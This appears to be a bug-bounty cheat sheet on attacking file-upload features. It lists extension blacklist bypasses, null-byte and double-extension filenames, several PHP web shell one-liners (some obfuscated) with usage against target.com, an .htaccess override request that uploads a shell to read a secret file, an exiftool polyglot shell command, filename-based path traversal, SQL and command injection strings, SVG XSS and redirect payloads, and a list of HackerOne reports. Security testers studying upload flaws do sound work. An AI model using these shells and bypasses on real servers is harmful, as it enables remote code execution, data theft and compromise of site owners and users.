File-Upload

File extension

# extension blacklisted:
PHP: .phtm, phtml, .phps, .pht, .php2, .php3, .php4, .php5, .shtml, .phar, .pgif, .inc
ASP: .asp, .aspx, .cer, .asa
Jsp: .jsp, .jspx, .jsw, .jsv, .jspf
Coldfusion: .cfm, .cfml, .cfc, .dbm
Using random capitalization: .pHp, .pHP5, .PhAr
pht,phpt,phtml,php3,php4,php5,php6,php7,phar,pgif,phtm,phps,shtml,phar,pgif,inc
# extension whitelisted:
file.jpg.php
file.php.jpg
file.php.blah123jpg
file.php%00.jpg
file.php\\x00.jpg
file.php%00
file.php%20
file.php%0d%0a.jpg
file.php.....
file.php/
file.php.\\
file.
.html

• Upload asp file using .cer & .asa extension (IIS — Windows)

• Upload .eml file when content-type = text/HTML

Payloads

<?php system($_GET["cmd"]);?> # ?cmd= (ex: ?cmd=ls -la")
<?=`$_GET[0]`?>               # ?0=command

<?=`$_POST[0]`?>          
# Usage : curl -X POST http://target.com/path/to/shell.php -d "0=command"

<?=`{$_REQUEST['_']}`?>      
# Usage: http://target.com/path/to/shell.php?_=command OR curl -X POST http://target.com/path/to/shell.php -d "_=command" '

<?=$_="";$_="'" ;$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>
# Usage : http://target.com/path/to/shell.php?0=command

<?php $_="{"; $_=($_^"<").($_^">;").($_^"/"); ?><?=${'_'.$_}['_'](${'_'.$_}['__']);?>
# Usage : http://target.com/path/to/shell.php?_=function&__=argument http://target.com/path/to/shell.php?_=system&__=ls

Content type

- Preserve name, but change content-type
Content-Type: image/jpeg, image/gif, image/png

Content length

# Small bad code:
<?='$_GET[x]'?>    

Impact by extension

asp, aspx, php5, php, php3: -->  webshell, rce
svg:                        --> stored xss, ssrf, xxe
gif:                        --> stored xss, ssrf
csv:                        --> csv injection
xml:                        --> xxe 
avi:                        --> lfi, ssrf
html, js:                   --> html injection, xss, open redirect
png, jpeg:                  --> pixel flood attack dos
zip:                        --> rce via lfi, dos
pdf, pptx:                  --> ssrf, blind xxe

File name

• Path traversal ../../etc/passwd/logo.png ../../../logo.png

• SQLi 'sleep(10).jpg sleep(10)-- -.jpg

• Command injection ; sleep 10;

• XSS <svg onload=alert(document.comain)>.svg

Other Test Cases

• Image-Tragic SVG images are just XML data. Using XML you can achieve lots of vulnerabilities, for instance Image Magic which is an image processing library is vulnerable to SSRF and RCE vulnerabilities.

  Source (Facebook RCE): Facebook's ImageTragick Remote Code Execution (4lemon.ru)

• Web shell upload via extension blacklist bypass [Overriding the server configuration]

  ------WebKitFormBoundary0G2tBRqMoRVtGqfG
  Content-Disposition: form-data; name="avatar"; filename=".htaccess"
  Content-Type: text/plain
  
  AddType application/x-httpd-php .l33t
  ------------------------------------------
  then 
  ------WebKitFormBoundary0G2tBRqMoRVtGqfG
  Content-Disposition: form-data; name="avatar"; filename="exploit.l33t"
  Content-Type: application/octet-stream
  
  <?php echo file_get_contents('/home/carlos/secret'); ?>
  ------WebKitFormBoundary0G2tBRqMoRVtGqfG

• Remote code execution via polyglot web shell upload

  exiftool.exe -Comment="<?php echo 'START ' . 'Hacked By h0tak88r :)' . ' END'; ?>" download.png -o polyglot.php

• EXIF-DATA not Stripped

  1. Got to Github ( https://github.com/ianare/exif-samples/tree/master/jpg)\

  2. There are lot of images having resolutions (i.e 1280 * 720 ) , and also whith different MB’s .\

  3. Go to Upload option on the website\

  4. Upload the image\

  5. see the path of uploaded image ( Either by right click on image then copy image address OR right click, inspect the image, the URL will come in the inspect , edit it as html )

  6. open it (http://exif.regex.info/exif.cgi)

  7. See whether is that still showing exif data , if it is then Report it. Reports (Hackerone)

  8. IDOR with Geolocation data not stripped from images

File Upload Exploitation

• SVG file To XSS

  	<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
  	<rect width="300" height="100" style="fill:rgb(0,0,255);stroke-width:3;stroke:rgb(0,0,0)" />
  	<script type="text/javascript">
  	alert("h0tak88r XSS");
  	</script>
  	</svg>

• Open Redirect when uploading svg files

      <code>
      <?xml version="1.0" encoding="UTF-8" standalone="yes"?>
      <svg
      onload="window.location='<http://www.google.com>'"
      xmlns="<http://www.w3.org/2000/svg>">
      </svg>
      </code>
      

Top Upload reports from HackerOne:

1. Remote Code Execution on www.semrush.com/my_reports on Logo upload to Semrush - 792 upvotes, $0

2. Webshell via File Upload on ecjobs.starbucks.com.cn to Starbucks - 673 upvotes, $0

3. Blind XSS on image upload to CS Money - 412 upvotes, $1000

4. Unrestricted file upload on [ambassador.mail.ru] to Mail.ru - 404 upvotes, $3000

5. [ RCE ] Through stopping the redirect in /admin/* the attacker able to bypass Authentication And Upload Malicious File to Mail.ru - 340 upvotes, $0

6. Unrestricted file upload leads to Stored XSS to Visma Public - 268 upvotes, $250

7. SSRF leaking internal google cloud data through upload function [SSH Keys, etc..] to Vimeo - 249 upvotes, $0

8. Arbitrary File Upload to Stored XSS to Visma Public - 245 upvotes, $250

9. Unrestricted File Upload Leads to RCE on mobile.starbucks.com.sg to Starbucks - 225 upvotes, $0

10. Admin Management - Login Using Default Password - Leads to Image Upload Backdoor/Shell to Razer - 199 upvotes, $200

11. External SSRF and Local File Read via video upload due to vulnerable FFmpeg HLS processing to TikTok - 139 upvotes, $2727

12. Unrestricted file upload in www.semrush.com > /my_reports/api/v1/upload/image to Semrush - 124 upvotes, $0

13. User can upload files even after closing his account to Basecamp - 114 upvotes, $0

14. XXE Injection through SVG image upload leads to SSRF to Zivver - 112 upvotes, $0

15. Insecure file upload in xiaoai.mi.com Lead to Stored XSS to Xiaomi - 107 upvotes, $0

16. Unrestricted File Upload on https://partner.tiktokshop.com/wsos_v2/oec_partner/upload to TikTok - 98 upvotes, $0

17. [insideok.ru] Remote Command Execution via file upload. to ok.ru - 94 upvotes, $0

18. Avatar upload allows arbitrary file overwriting to Mail.ru - 88 upvotes, $750

19. Unrestricted file upload leads to Stored XSS to GitLab - 82 upvotes, $0

20. Unauthenticated user can upload an attachment to the last updated report draft to HackerOne - 80 upvotes, $0

21. XSS from arbitrary attachment upload. to Qulture.Rocks - 74 upvotes, $0

22. Open s3 bucket allows for public upload to Augur - 73 upvotes, $100

23. SSRF and local file disclosure by video upload on https://www.redtube.com/upload to Pornhub - 61 upvotes, $500

24. Cross site scripting via file upload in subdomain ads.tiktok.com to TikTok - 59 upvotes, $500

25. Unrestricted file upload when creating quotes allows for Stored XSS to Visma Public - 57 upvotes, $250

26. Singapore - Unrestricted File Upload Leads to XSS on campaign.starbucks.com.sg/api/upload to Starbucks - 57 upvotes, $0

27. Stored XSS on upload files leads to steal cookie to Palo Alto Software - 56 upvotes, $0

28. SSRF and local file disclosure by video upload on https://www.tube8.com/ to Pornhub - 53 upvotes, $500

29. Unrestricted File Upload Results in Cross-Site Scripting Attacks to Uber - 53 upvotes, $0

30. SSRF in VCARD photo upload functionality to Open-Xchange - 49 upvotes, $850